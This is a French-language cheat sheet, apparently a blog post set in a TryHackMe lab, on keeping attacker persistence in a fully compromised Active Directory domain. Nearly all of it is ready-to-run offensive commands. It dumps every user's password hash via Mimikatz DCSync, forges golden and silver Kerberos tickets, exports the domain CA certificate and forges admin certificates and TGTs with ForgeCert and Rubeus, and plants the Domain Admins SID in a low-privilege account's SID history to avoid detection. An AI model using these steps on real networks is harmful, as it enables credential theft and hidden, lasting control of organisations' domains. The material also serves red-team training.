[Persistence/AD] Cheat-sheet
Introduction
Lorsqu'un domaine est compromis par un pirate et qu'il parvient à avoir les pleins pouvoir dessus, il va généralement mettre en place des techniques de persistence pour s'implanter et garder ses accès.
Toutes les opérations présentées sont à réaliser depuis le contrôleur de domaine.
Techniques
AD synchronisation
L'Active Directory permet la réplication ce qui permet en temps normal de pouvoir utiliser plusieurs contrôleurs de domaine dans une forêt en ayant les mêmes identifiants pour nos utilisateurs sur tous les domaines de la forêt.
Cependant, nous allons nous servir de cette fonctionnalité pour récupérer tous les utilisateurs du domaine avec le hash de leur mot de passe associé.
Pour cela, on peut utiliser Mimikatz :
log dc_dump.txtlsadump::dcsync /domain:za.tryhackme.loc /allSinon on peut cibler un utilisateur précis :
lsadump::dcsync /domain:za.tryhackme.loc /user:<USERNAME>Cette opération peut prendre du temps selon la taille du domaine.
Pour récupérer les hashs :
cat dcdump.txt | grep "Hash NTLM"Et les noms d'utilisateurs :
cat dcdump.txt | grep "SAM Username"Golden et Silver Ticket
- Pour générer un golden ticket, vous devez avoir en votre possession, le hash NTLM de l'utilisateur krbtgt et le SID du domaine qui peut être retrouvé avec la commande Powershell Get-ADDomain.
Ensuite lancez Mimikatz :
kerberos::golden /admin:ReallyNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:<Domain SID> /krbtgt:<NTLM hash of KRBTGT account> /endin:600 /renewmax:10080 /ptt- Pour générer un silver ticket, il vous faut le hash NTLM du compte de service compromis :
kerberos::golden /admin:StillNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /pttCertificat
Vous pouvez générer un certificat malveillant qui vous permettra de générer des tickets TGT à souhait.
Un des avantages de cette technique est sa capacité à passer sous les radars pour l'équipe blue team.
Depuis Mimikatz :
privilege::debugcrypto::capicrypto::cngcrypto::certificates /systemstore:local_machine /exportUne fois le certificat du contrôleur de domaine exporté, vous pouvez utiliser ForgeCert pour générer un certificat :
ForgeCert.exe --CaCertPath za-THMDC-CA.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@za.tryhackme.loc --NewCertPath fullAdmin.pfx --NewCertPassword Password123 Ensuite, on peut utiliser utiliser Rubeus pour générer un TGT à partir du certificat généré précédemment :
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate: /password: /outfile: /domain:za.tryhackme.loc /dc:On peut utiliser Mimikatz pour injecter le TGT :
kerberos::ptt administrator.kirbiHistorique SID
Il est possible d'utiliser un deuxième SID sur un compte utilisateur du domaine (ce qui est normalement pratique pour les migrations).
On peut donc s'amuser à utiliser un deuxième SID pour un utilisateur compromis à bas niveau de privilège.
L'objectif va être de lui donner en deuxième SID, le SID du groupe Administrateur du domaine afin de passer inaperçu.
Tout d'abord, on vérifie que le SID history de notre utilisateur n'est pas définit :
Get-ADUser <USERNAME> -properties sidhistory,memberofLe SID doit ressembler à cela :
SIDHistory : {}On peut ensuite récupérer le SID du groupe Admin :
Get-ADGroup "Domain Admins"Le service NTDS doit être redémarré pour prendre en compte les changements :
Stop-Service -Name ntds -force On ajoute le SID history :
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.ditEt on redémarre le service NTDS :
Start-Service -Name ntdsEn utilisant le compte à bas privilège initial vous devriez avoir les droits complets sur le domaine.